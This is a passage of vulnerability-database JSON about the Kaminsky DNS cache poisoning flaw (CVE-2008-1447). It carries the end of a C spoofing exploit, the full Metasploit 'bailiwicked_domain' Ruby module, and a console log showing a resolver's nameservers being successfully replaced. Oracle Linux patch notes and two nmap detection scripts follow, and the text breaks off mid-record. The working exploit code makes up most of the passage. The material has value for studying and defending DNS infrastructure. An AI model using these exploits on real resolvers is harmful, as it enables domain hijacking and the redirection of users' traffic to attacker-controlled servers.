(uint16_t)strtoul(argv[4], NULL, 0);\n const char *subhost = argv[5];\n const char *domain = argv[6];\n const char *anyip = argv[7];\n uint16_t attempts = (uint16_t)strtoul(argv[8], NULL, 0);\n uint16_t replies = (uint16_t)strtoul(argv[9], NULL, 0);\n if (domain[strlen(domain) - 1 ] != '.')\n fprintf(stderr, \"domain must end with dot(.): %s\\n\", domain), exit(1);\n printf(\"Chance of success: 1-(1-%d/65536)**%d = %.2f\\n\", replies, attempts, 1 - pow((1 - replies / 65536.), attempts));\n srand(time(NULL));\n int unique = rand() + (rand() << 16);\n u_char buf[IP_LEN_MAX];\n unsigned len;\n char name[256];\n char ns[256];\n ip_t *iph;\n if ((iph = ip_open()) == NULL)\n err(1, \"ip_open\");\n int cnt = 0;\n while (cnt < attempts)\n {\n // send a query for a random hostname\n snprintf(name, sizeof (name), \"%08x%08x.%s\", unique, cnt, domain);\n len = build_query(buf, querier, ip_resolver, name);\n if (ip_send(iph, buf, len) != len)\n err(1, \"ip_send\");\n // give the resolver enough time to 
forward the query and be in a state\n // where it waits for answers; sleeping 10ms here limits the number of\n // attempts to 100 per sec\n usleep(10000);\n // send spoofed replies, each reply contains:\n // - 1 query: query for the \"random hostname\"\n // - 1 answer: \"random hostname\" A 1.1.1.1\n // - 1 authoritative nameserver: <domain> NS <subhost>.<domain>\n // - 1 additional record: <subhost>.<domain> A <any-ip>\n snprintf(ns, sizeof (ns), \"%s.%s\", subhost, domain);\n unsigned r;\n for (r = 0; r < replies; r++)\n {\n // use a txid that is just 'r': 0..(replies-1)\n len = build_response(buf, ip_authoritative, ip_resolver,\n port_resolver, r, name, \"1.1.1.1\", domain, ns, anyip);\n if (ip_send(iph, buf, len) != len)\n err(1, \"ip_send\");\n }\n cnt++;\n }\n ip_close(iph);\n return 0;\n}\n\n// milw0rm.com [2008-07-25]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-04-01T19:04:05", "description": "\nBIND 9.4.1 9.4.2 - Remote DNS Cache Poisoning (Metasploit)", "edition": 1, "published": "2008-07-23T00:00:00", "title": "BIND 9.4.1 9.4.2 - Remote DNS Cache Poisoning (Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-23T00:00:00", "id": "EXPLOITPACK:27E16B81271E43AFE05860EF5FF64C4D", "href": "", "sourceData": " ____ ____ __ __\n / \\ / \\ | | | |\n ----====####/ /\\__\\##/ /\\ \\##| |##| |####====----\n | | | |__| | | | | |\n | | ___ | __ | | | | |\n ------======######\\ \\/ /#| |##| |#| |##| |######======------\n \\____/ |__| |__| \\______/\n \n Computer Academic Underground\n http://www.caughq.org\n Exploit Code\n\n===============/========================================================\nExploit ID: CAU-EX-2008-0003\nRelease Date: 2008.07.23\nTitle: bailiwicked_domain.rb\nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit for Domains\nTested: BIND 9.4.1-9.4.2\nAttributes: Remote, Poison, Resolver, Metasploit\nExploit URL: 
http://www.caughq.org/exploits/CAU-EX-2008-0003.txt\nAuthor/Email: I)ruid <druid (@) caughq.org>\n H D Moore <hdm (@) metasploit.com>\n===============/========================================================\n\nDescription\n===========\n\nThis exploit targets a fairly ubiquitous flaw in DNS implementations\nwhich allow the insertion of malicious DNS records into the cache of the\ntarget nameserver. This exploit caches a single malicious nameserver\nentry into the target nameserver which replaces the legitimate\nnameservers for the target domain. By causing the target nameserver to\nquery for random hostnames at the target domain, the attacker can spoof\na response to the target server including an answer for the query, an\nauthority server record, and an additional record for that server,\ncausing target nameserver to insert the additional record into the\ncache. This insertion completely replaces the original nameserver\nrecords for the target domain.\n\n\nExample\n=======\n\n# /msf3/msfconsole\n\n ## ### ## ##\n ## ## #### ###### #### ##### ##### ## #### ######\n####### ## ## ## ## ## ## ## ## ## ## ### ##\n####### ###### ## ##### #### ## ## ## ## ## ## ##\n## # ## ## ## ## ## ## ##### ## ## ## ## ##\n## ## #### ### ##### ##### ## #### #### #### ###\n ##\n\n\n =[ msf v3.2-release\n+ -- --=[ 298 exploits - 124 payloads\n+ -- --=[ 18 encoders - 6 nops\n =[ 73 aux\n\nmsf > use auxiliary/spoof/dns/bailiwicked_domain\nmsf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D\nRHOST => A.B.C.D\nmsf auxiliary(bailiwicked_domain) > set DOMAIN example.com\nDOMAIN => example.com\nmsf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com\nNEWDNS => dns01.metasploit.com\nmsf auxiliary(bailiwicked_domain) > set SRCPORT 0\nSRCPORT => 0\nmsf auxiliary(bailiwicked_domain) > check\n[*] Using the Metasploit service to verify exploitability...\n[*] >> ADDRESS: A.B.C.D PORT: 50391\n[*] >> ADDRESS: A.B.C.D PORT: 50391\n[*] >> ADDRESS: A.B.C.D PORT: 50391\n[*] >> ADDRESS: 
A.B.C.D PORT: 50391\n[*] >> ADDRESS: A.B.C.D PORT: 50391\n[*] FAIL: This server uses static source ports and is vulnerable to poisoning\nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D\n[*] exec: dig +short -t ns example.com @A.B.C.D\n\nb.iana-servers.net.\na.iana-servers.net.\n\nmsf auxiliary(bailiwicked_domain) > run\n[*] Switching to target port 50391 based on Metasploit service\n[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com\n[*] Querying recon nameserver for example.com.'s nameservers...\n[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net.\n[*] Querying recon nameserver for address of b.iana-servers.net....\n[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236\n[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com....\n[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as\n[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net.\n[*] Querying recon nameserver for address of a.iana-servers.net....\n[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43\n[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com....\n[*] a.iana-servers.net. 
is authoritative for example.com., adding to list of nameservers to spoof as\n[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...\n[*] Sent 1000 queries and 20000 spoofed responses...\n[*] Sent 2000 queries and 40000 spoofed responses...\n[*] Sent 3000 queries and 60000 spoofed responses...\n[*] Sent 4000 queries and 80000 spoofed responses...\n[*] Sent 5000 queries and 100000 spoofed responses...\n[*] Sent 6000 queries and 120000 spoofed responses...\n[*] Sent 7000 queries and 140000 spoofed responses...\n[*] Sent 8000 queries and 160000 spoofed responses...\n[*] Sent 9000 queries and 180000 spoofed responses...\n[*] Sent 10000 queries and 200000 spoofed responses...\n[*] Sent 11000 queries and 220000 spoofed responses...\n[*] Sent 12000 queries and 240000 spoofed responses...\n[*] Sent 13000 queries and 260000 spoofed responses...\n[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com\n[*] Auxiliary module execution completed\n\nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D\n[*] exec: dig +short -t ns example.com @A.B.C.D\n\ndns01.metasploit.com.\n\n\nCredits\n=======\n\nDan Kaminsky is credited with originally discovering this vulnerability.\n\nCedric Blancher <sid (@) rstack.org> figured out the NS injection method and \nwas cool enough to email us and share!\n\n\nReferences\n==========\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\nhttp://www.kb.cert.org/vuls/id/800113\n\n\nMetasploit\n==========\n\nrequire 'msf/core'\nrequire 'net/dns'\nrequire 'scruby'\nrequire 'resolv'\n\nmodule Msf\n\nclass Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary\n\n\tinclude Exploit::Remote::Ip\n\n\tdef initialize(info = {})\n\t\tsuper(update_info(info,\t\n\t\t\t'Name' => 'DNS BailiWicked Domain Attack',\n\t\t\t'Description' => %q{\n\t\t\t\tThis exploit attacks a fairly ubiquitous flaw in DNS implementations which \n\t\t\t\tDan Kaminsky found and disclosed 
~Jul 2008. This exploit replaces the target\n\t\t\t\tdomain's nameserver entries in a vulnerable DNS cache server. This attack works\n\t\t\t\tby sending random hostname queries to the target DNS server coupled with spoofed\n\t\t\t\treplies to those queries from the authoritative nameservers for that domain.\n\t\t\t\tEventually, a guessed ID will match, the spoofed packet will get accepted, and\n\t\t\t\tthe nameserver entries for the target domain will be replaced by the server\n\t\t\t\tspecified in the NEWDNS option of this exploit.\n\t\t\t},\n\t\t\t'Author' => \n\t\t\t\t[ \n\t\t\t\t\t'I)ruid', 'hdm',\n\t\t\t\t\t #\n\t\t\t\t\t'Cedric Blancher <sid[at]rstack.org>' # Cedric figured out the NS injection method \n\t\t\t\t\t # and was cool enough to email us and share!\n\t\t\t\t\t #\n\t\t\t\t],\n\t\t\t'License' => MSF_LICENSE,\n\t\t\t'Version' => '$Revision: 5591 $',\n\t\t\t'References' =>\n\t\t\t\t[\n\t\t\t\t\t[ 'CVE', '2008-1447' ],\n\t\t\t\t\t[ 'US-CERT-VU', '800113' ],\n\t\t\t\t\t[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.txt' ],\n\t\t\t\t],\n\t\t\t'DisclosureDate' => 'Jul 21 2008'\n\t\t\t))\n\t\t\t\n\t\t\tregister_options(\n\t\t\t\t[\n\t\t\t\t\tOptPort.new('SRCPORT', [true, \"The target server's source query port (0 for automatic)\", nil]),\n\t\t\t\t\tOptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']),\n\t\t\t\t\tOptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]),\n\t\t\t\t\tOptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']),\n\t\t\t\t\tOptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]),\n\t\t\t\t\tOptInt.new('TTL', [true, 'TTL for the malicious NS entry', 31337]),\n\t\t\t\t], self.class)\n\t\t\t\t\t\n\tend\n\t\n\tdef auxiliary_commands\n\t\treturn { \"check\" => \"Determine if the specified DNS server (RHOST) is vulnerable\" }\n\tend\n\n\tdef cmd_check(*args)\n\t\ttarg = args[0] || rhost()\n\t\tif(not (targ and targ.length > 
0))\n\t\t\tprint_status(\"usage: check [dns-server]\")\n\t\t\treturn\n\t\tend\n\n\t\tprint_status(\"Using the Metasploit service to verify exploitability...\")\n\t\tsrv_sock = Rex::Socket.create_udp(\n\t\t\t'PeerHost' => targ,\n\t\t\t'PeerPort' => 53\n\t\t)\t\t\n\n\t\trandom = false\n\t\tports = []\n\t\tlport = nil\n\t\t\n\t\t1.upto(5) do |i|\n\t\t\n\t\t\treq = Resolv::DNS::Message.new\n\t\t\ttxt = \"spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\"\n\t\t\treq.add_question(txt, Resolv::DNS::Resource::IN::TXT)\n\t\t\treq.rd = 1\n\t\t\t\n\t\t\tsrv_sock.put(req.encode)\n\t\t\tres, addr = srv_sock.recvfrom()\n\t\t\t\n\n\t\t\tif res and res.length > 0\n\t\t\t\tres = Resolv::DNS::Message.decode(res)\n\t\t\t\tres.each_answer do |name, ttl, data|\n\t\t\t\t\tif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m)\n\t\t\t\t\t\tt_addr, t_port = $1.split(':')\n\n\t\t\t\t\t\tprint_status(\" >> ADDRESS: #{t_addr} PORT: #{t_port}\")\n\t\t\t\t\t\tt_port = t_port.to_i\n\t\t\t\t\t\tif(lport and lport != t_port)\n\t\t\t\t\t\t\trandom = true\n\t\t\t\t\t\tend\n\t\t\t\t\t\tlport = t_port\n\t\t\t\t\t\tports << t_port\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\t\n\t\tend\n\t\t\n\t\tsrv_sock.close\n\t\t\n\t\tif(ports.length < 5)\n\t\t\tprint_status(\"UNKNOWN: This server did not reply to our vulnerability check requests\")\n\t\t\treturn\n\t\tend\n\t\t\n\t\tif(random)\n\t\t\tprint_status(\"PASS: This server does not use a static source port. 
Ports: #{ports.join(\", \")}\")\n\t\t\tprint_status(\" This server may still be exploitable, but not by this tool.\")\n\t\telse\n\t\t\tprint_status(\"FAIL: This server uses static source ports and is vulnerable to poisoning\")\n\t\tend\n\tend\n\t\t\n\tdef run\n\t\ttarget = rhost()\n\t\tsource = Rex::Socket.source_address(target)\n\t\tsport = datastore['SRCPORT']\n\t\tdomain = datastore['DOMAIN'] + '.'\n\t\tnewdns = datastore['NEWDNS']\n\t\trecons = datastore['RECONS']\n\t\txids = datastore['XIDS'].to_i\n\t\tnewttl = datastore['TTL'].to_i\n\t\txidbase = rand(20001) + 20000\n\t\t\n\t\taddress = Rex::Text.rand_text(4).unpack(\"C4\").join(\".\")\n\n\t\tsrv_sock = Rex::Socket.create_udp(\n\t\t\t'PeerHost' => target,\n\t\t\t'PeerPort' => 53\n\t\t)\n\n\t\t# Get the source port via the metasploit service if it's not set\n\t\tif sport.to_i == 0\n\t\t\treq = Resolv::DNS::Message.new\n\t\t\ttxt = \"spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\"\n\t\t\treq.add_question(txt, Resolv::DNS::Resource::IN::TXT)\n\t\t\treq.rd = 1\n\t\t\t\n\t\t\tsrv_sock.put(req.encode)\n\t\t\tres, addr = srv_sock.recvfrom()\n\t\t\t\n\t\t\tif res and res.length > 0\n\t\t\t\tres = Resolv::DNS::Message.decode(res)\n\t\t\t\tres.each_answer do |name, ttl, data|\n\t\t\t\t\tif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m)\n\t\t\t\t\t\tt_addr, t_port = $1.split(':')\n\t\t\t\t\t\tsport = t_port.to_i\n\n\t\t\t\t\t\tprint_status(\"Switching to target port #{sport} based on Metasploit service\")\n\t\t\t\t\t\tif target != t_addr\n\t\t\t\t\t\t\tprint_status(\"Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!\")\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\t# Verify its not already poisoned\n\t\tbegin\n\t\t\tquery = Resolv::DNS::Message.new\n\t\t\tquery.add_question(domain, Resolv::DNS::Resource::IN::NS)\n\t\t\tquery.rd = 0\n\n\t\t\tbegin\n\t\t\t\tcached = 
false\n\t\t\t\tsrv_sock.put(query.encode)\n\t\t\t\tanswer, addr = srv_sock.recvfrom()\n\n\t\t\t\tif answer and answer.length > 0\n\t\t\t\t\tanswer = Resolv::DNS::Message.decode(answer)\n\t\t\t\t\tanswer.each_answer do |name, ttl, data|\n\n\t\t\t\t\t\tif((name.to_s + \".\") == domain and data.name.to_s == newdns)\n\t\t\t\t\t\t\tt = Time.now + ttl\n\t\t\t\t\t\t\tprint_status(\"Failure: This domain is already using #{newdns} as a nameserver\")\n\t\t\t\t\t\t\tprint_status(\" Cache entry expires on #{t.to_s}\")\n\t\t\t\t\t\t\tsrv_sock.close\n\t\t\t\t\t\t\tdisconnect_ip\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\t\t\n\t\t\t\tend\n\t\t\tend until not cached\n\t\trescue ::Interrupt\n\t\t\traise $!\n\t\trescue ::Exception => e\n\t\t\tprint_status(\"Error checking the DNS name: #{e.class} #{e} #{e.backtrace}\")\n\t\tend\n\n\n\t\tres0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver\n\n\t\tprint_status \"Targeting nameserver #{target} for injection of #{domain} nameservers as #{newdns}\"\n\n\t\t# Look up the nameservers for the domain\n\t\tprint_status \"Querying recon nameserver for #{domain}'s nameservers...\"\n\t\tanswer0 = res0.send(domain, Net::DNS::NS)\n\t\t#print_status \" Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities\"\n\n\t\tbarbs = [] # storage for nameservers\n\t\tanswer0.answer.each do |rr0|\n\t\t\tprint_status \" Got an #{rr0.type} record: #{rr0.inspect}\"\n\t\t\tif rr0.type == 'NS'\n\t\t\t\tprint_status \" Querying recon nameserver for address of #{rr0.nsdname}...\"\n\t\t\t\tanswer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname\n\t\t\t\t#print_status \" Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities\"\n\t\t\t\tanswer1.answer.each do |rr1|\n\t\t\t\t\tprint_status \" Got an #{rr1.type} record: #{rr1.inspect}\"\n\t\t\t\t\tres2 = Net::DNS::Resolver.new(:nameservers => 
rr1.address, :dns_search => false, :recursive => false, :retry => 1) \n\t\t\t\t\tprint_status \" Checking Authoritativeness: Querying #{rr1.address} for #{domain}...\"\n\t\t\t\t\tanswer2 = res2.send(domain)\n\t\t\t\t\tif answer2 and answer2.header.auth? and answer2.header.anCount >= 1\n\t\t\t\t\t\tnsrec = {:name => rr0.nsdname, :addr => rr1.address}\n\t\t\t\t\t\tbarbs << nsrec\n\t\t\t\t\t\tprint_status \" #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as\"\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\t\n\t\tend\n\n\t\tif barbs.length == 0\n\t\t\tprint_status( \"No DNS servers found.\")\n\t\t\tsrv_sock.close\n\t\t\tdisconnect_ip\n\t\t\treturn\n\t\tend\n\n\t\t# Flood the target with queries and spoofed responses, one will eventually hit\n\t\tqueries = 0\n\t\tresponses = 0\n\n\t\tconnect_ip if not ip_sock\n\n\t\tprint_status( \"Attempting to inject poison records for #{domain}'s nameservers into #{target}:#{sport}...\")\n\n\t\twhile true\n\t\t\trandhost = Rex::Text.rand_text_alphanumeric(12) + '.' 
+ domain # randomize the hostname\n\n\t\t\t# Send spoofed query\n\t\t\treq = Resolv::DNS::Message.new\n\t\t\treq.id = rand(2**16)\n\t\t\treq.add_question(randhost, Resolv::DNS::Resource::IN::A)\n\n\t\t\treq.rd = 1\n\n\t\t\tbuff = (\n\t\t\t\tScruby::IP.new(\n\t\t\t\t\t#:src => barbs[0][:addr].to_s,\n\t\t\t\t\t:src => source,\n\t\t\t\t\t:dst => target,\n\t\t\t\t\t:proto => 17\n\t\t\t\t)/Scruby::UDP.new(\n\t\t\t\t\t:sport => (rand((2**16)-1024)+1024).to_i,\n\t\t\t\t\t:dport => 53\n\t\t\t\t)/req.encode\n\t\t\t).to_net\n\t\t\tip_sock.sendto(buff, target)\n\t\t\tqueries += 1\n\t\t\t\n\t\t\t# Send evil spoofed answer from ALL nameservers (barbs[*][:addr])\n\t\t\treq.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address))\n\t\t\treq.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns)))\n\t\t\treq.add_additional(newdns, newttl, Resolv::DNS::Resource::IN::A.new(address)) # Ignored\n\t\t\treq.qr = 1\n\t\t\treq.aa = 1\n\n\t\t\txidbase.upto(xidbase+xids-1) do |id|\n\t\t\t\treq.id = id\n\t\t\t\tbarbs.each do |barb|\n\t\t\t\t\tbuff = (\n\t\t\t\t\t\tScruby::IP.new(\n\t\t\t\t\t\t\t#:src => barbs[i][:addr].to_s,\n\t\t\t\t\t\t\t:src => barb[:addr].to_s,\n\t\t\t\t\t\t\t:dst => target,\n\t\t\t\t\t\t\t:proto => 17\n\t\t\t\t\t\t)/Scruby::UDP.new(\n\t\t\t\t\t\t\t:sport => 53,\n\t\t\t\t\t\t\t:dport => sport.to_i\n\t\t\t\t\t\t)/req.encode\n\t\t\t\t\t).to_net\n\t\t\t\t\tip_sock.sendto(buff, target)\n\t\t\t\t\tresponses += 1\n\t\t\t\tend\n\t\t\tend\n\n\t\t\t# status update\n\t\t\tif queries % 1000 == 0\n\t\t\t\tprint_status(\"Sent #{queries} queries and #{responses} spoofed responses...\")\n\t\t\tend\n\n\t\t\t# every so often, check and see if the target is poisoned...\n\t\t\tif queries % 250 == 0 \n\t\t\t\tbegin\n\t\t\t\t\tquery = Resolv::DNS::Message.new\n\t\t\t\t\tquery.add_question(domain, Resolv::DNS::Resource::IN::NS)\n\t\t\t\t\tquery.rd = 0\n\t\n\t\t\t\t\tsrv_sock.put(query.encode)\n\t\t\t\t\tanswer, addr = 
srv_sock.recvfrom()\n\n\t\t\t\t\tif answer and answer.length > 0\n\t\t\t\t\t\tanswer = Resolv::DNS::Message.decode(answer)\n\t\t\t\t\t\tanswer.each_answer do |name, ttl, data|\n\t\t\t\t\t\t\tif((name.to_s + \".\") == domain and data.name.to_s == newdns)\n\t\t\t\t\t\t\t\tprint_status(\"Poisoning successful after #{queries} attempts: #{domain} == #{newdns}\")\n\t\t\t\t\t\t\t\tsrv_sock.close\n\t\t\t\t\t\t\t\tdisconnect_ip\n\t\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\trescue ::Interrupt\n\t\t\t\t\traise $!\n\t\t\t\trescue ::Exception => e\n\t\t\t\t\tprint_status(\"Error querying the DNS name: #{e.class} #{e} #{e.backtrace}\")\n\t\t\t\tend\n\t\t\tend\n\n\t\tend\n\n\tend\n\nend\nend\t\n\n# milw0rm.com [2008-07-23]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:35:31", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "[2.45-1.el5.1]\n- update to new upstream version\n- fixes for CVE-2008-1447/CERT VU#800113\n- Resolves: rhbz#454869", "edition": 4, "modified": "2008-08-11T00:00:00", "published": "2008-08-11T00:00:00", "id": "ELSA-2008-0789", "href": "http://linux.oracle.com/errata/ELSA-2008-0789.html", "title": "dnsmasq security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:36:22", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "bind: \n[9.3.4-6.0.1.P1]\n- CVE-2008-1447\nselinux-policy:\n[2.4.6-137.1]\n- Allow named to bind to any udp port\nResolves: #451971", "edition": 4, "modified": "2008-07-08T00:00:00", "published": "2008-07-08T00:00:00", "id": "ELSA-2008-0533", "href": "http://linux.oracle.com/errata/ELSA-2008-0533.html", "title": "bind security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "nmap": [{"lastseen": "2019-05-30T17:05:55", "description": "Checks a DNS server for the 
predictable-port recursion vulnerability. Predictable source ports can make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447). \n\nThe script works by querying porttest.dns-oarc.net (see https://www.dns-oarc.net/oarc/services/porttest). Be aware that any targets against which this script is run will be sent to and potentially recorded by one or more DNS servers and the porttest server. In addition your IP address will be sent along with the porttest query to the DNS server running on the target.\n\n## Example Usage \n \n \n nmap -sU -p 53 --script=dns-random-srcport <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 53/udp open domain udp-response\n |_dns-random-srcport: X.X.X.X is GREAT: 26 queries in 1.2 seconds from 26 ports with std dev 17905\n\n## Requires \n\n * comm\n * nmap\n * shortport\n * string\n * stdnse\n\n* * *\n", "edition": 7, "published": "2008-11-06T02:52:59", "title": "dns-random-srcport NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2018-08-28T15:56:45", "id": "NMAP:DNS-RANDOM-SRCPORT.NSE", "href": "https://nmap.org/nsedoc/scripts/dns-random-srcport.html", "sourceData": "local comm = require \"comm\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nChecks a DNS server for the predictable-port recursion vulnerability.\nPredictable source ports can make a DNS server vulnerable to cache poisoning\nattacks (see CVE-2008-1447).\n\nThe script works by querying porttest.dns-oarc.net (see\nhttps://www.dns-oarc.net/oarc/services/porttest). Be aware that any\ntargets against which this script is run will be sent to and\npotentially recorded by one or more DNS servers and the porttest\nserver. 
In addition your IP address will be sent along with the\nporttest query to the DNS server running on the target.\n]]\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\nauthor = [[\nScript: Brandon Enright <bmenrigh@ucsd.edu>\nporttest.dns-oarc.net: Duane Wessels <wessels@dns-oarc.net>\n]]\n\n---\n-- @usage\n-- nmap -sU -p 53 --script=dns-random-srcport <target>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 53/udp open domain udp-response\n-- |_dns-random-srcport: X.X.X.X is GREAT: 26 queries in 1.2 seconds from 26 ports with std dev 17905\n\n-- This script uses (with permission) Duane Wessels' porttest.dns-oarc.net\n-- service. Duane/OARC believe the service is valuable to the community\n-- and have no plans to ever turn the service off.\n-- The likely long-term availability makes this script a good candidate\n-- for inclusion in Nmap proper.\n\ncategories = {\"external\", \"intrusive\"}\n\n\nportrule = shortport.portnumber(53, \"udp\")\n\nlocal function fail (err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n\n -- TXID: 0xbeef\n -- Flags: 0x0100\n -- Questions: 1\n -- Answer RRs: 0\n -- Authority RRs: 0\n -- Additional RRs: 0\n\n -- Query:\n -- Name: porttest, dns-oarc, net\n -- Type: TXT (0x0010)\n -- Class: IN (0x0001)\n\n local query = string.char( 0xbe, 0xef, -- TXID\n 0x01, 0x00, -- Flags\n 0x00, 0x01, -- Questions\n 0x00, 0x00, -- Answer RRs\n 0x00, 0x00, -- Authority RRs\n 0x00, 0x00, -- Additional RRs\n 0x08) .. \"porttest\" ..\n \"\\x08\" .. \"dns-oarc\" ..\n \"\\x03\" .. 
\"net\" ..\n string.char( 0x00, -- Name terminator\n 0x00, 0x10, -- Type (TXT)\n 0x00, 0x01) -- Class (IN)\n\n local status, result = comm.exchange(host, port, query, {proto=\"udp\",\n timeout=20000})\n\n -- Fail gracefully\n if not status then\n return fail(result)\n end\n\n -- Update the port\n nmap.set_port_state(host, port, \"open\")\n\n -- Now we need to \"parse\" the results to check to see if they are good\n\n -- We need a minimum of 5 bytes...\n if (#result < 5) then\n return fail(\"Malformed response\")\n end\n\n -- Check TXID\n if (string.byte(result, 1) ~= 0xbe\n or string.byte(result, 2) ~= 0xef) then\n return fail(\"Invalid Transaction ID\")\n end\n\n -- Check response flag and recursion\n if not ((string.byte(result, 3) & 0x80) == 0x80\n and (string.byte(result, 4) & 0x80) == 0x80) then\n return fail(\"Server refused recursion\")\n end\n\n -- Check error flag\n if (string.byte(result, 4) & 0x0F) ~= 0x00 then\n return fail(\"Server failure\")\n end\n\n -- Check for two Answer RRs and 1 Authority RR\n if (string.byte(result, 5) ~= 0x00\n or string.byte(result, 6) ~= 0x01\n or string.byte(result, 7) ~= 0x00\n or string.byte(result, 8) ~= 0x02) then\n return fail(\"Response did not include expected answers\")\n end\n\n -- We need a minimum of 128 bytes...\n if (#result < 128) then\n return fail(\"Truncated response\")\n end\n\n -- Here is the really fragile part. 
If the DNS response changes\n -- in any way, this won't work and will fail.\n -- Jump to second answer and check to see that it is TXT, IN\n -- then grab the length and display that text...\n\n -- Check for TXT\n if (string.byte(result, 118) ~= 0x00\n or string.byte(result, 119) ~= 0x10)\n then\n return fail(\"Answer record not of type TXT\")\n end\n\n -- Check for IN\n if (string.byte(result, 120) ~= 0x00\n or string.byte(result, 121) ~= 0x01) then\n return fail(\"Answer record not of type IN\")\n end\n\n -- Get TXT length\n local txtlen = string.byte(result, 128)\n\n -- We now need a minimum of 128 + txtlen bytes + 1...\n if (#result < 128 + txtlen) then\n return fail(\"Truncated response\")\n end\n\n -- GET TXT record\n local txtrd = string.sub(result, 129, 128 + txtlen)\n\n return txtrd\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-30T17:05:16", "description": "Checks a DNS server for the predictable-TXID DNS recursion vulnerability. Predictable TXID values can make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447). \n\nThe script works by querying txidtest.dns-oarc.net (see https://www.dns-oarc.net/oarc/services/txidtest). Be aware that any targets against which this script is run will be sent to and potentially recorded by one or more DNS servers and the txidtest server. 
In addition your IP address will be sent along with the txidtest query to the DNS server running on the target.\n\n## Example Usage \n \n \n nmap -sU -p 53 --script=dns-random-txid <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 53/udp open domain udp-response\n |_dns-random-txid: X.X.X.X is GREAT: 27 queries in 61.5 seconds from 27 txids with std dev 20509\n\n## Requires \n\n * comm\n * nmap\n * shortport\n * string\n * stdnse\n\n* * *\n", "edition": 3, "published": "2008-11-06T02:52:59", "title": "dns-random-txid NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2018-08-28T15:56:45", "id": "NMAP:DNS-RANDOM-TXID.NSE", "href": "https://nmap.org/nsedoc/scripts/dns-random-txid.html", "sourceData": "local comm = require \"comm\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nChecks a DNS server for the predictable-TXID DNS recursion\nvulnerability. Predictable TXID values can make a DNS server vulnerable to\ncache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying txidtest.dns-oarc.net (see\nhttps://www.dns-oarc.net/oarc/services/txidtest). Be aware that any\ntargets against which this script is run will be sent to and\npotentially recorded by one or more DNS servers and the txidtest\nserver. 
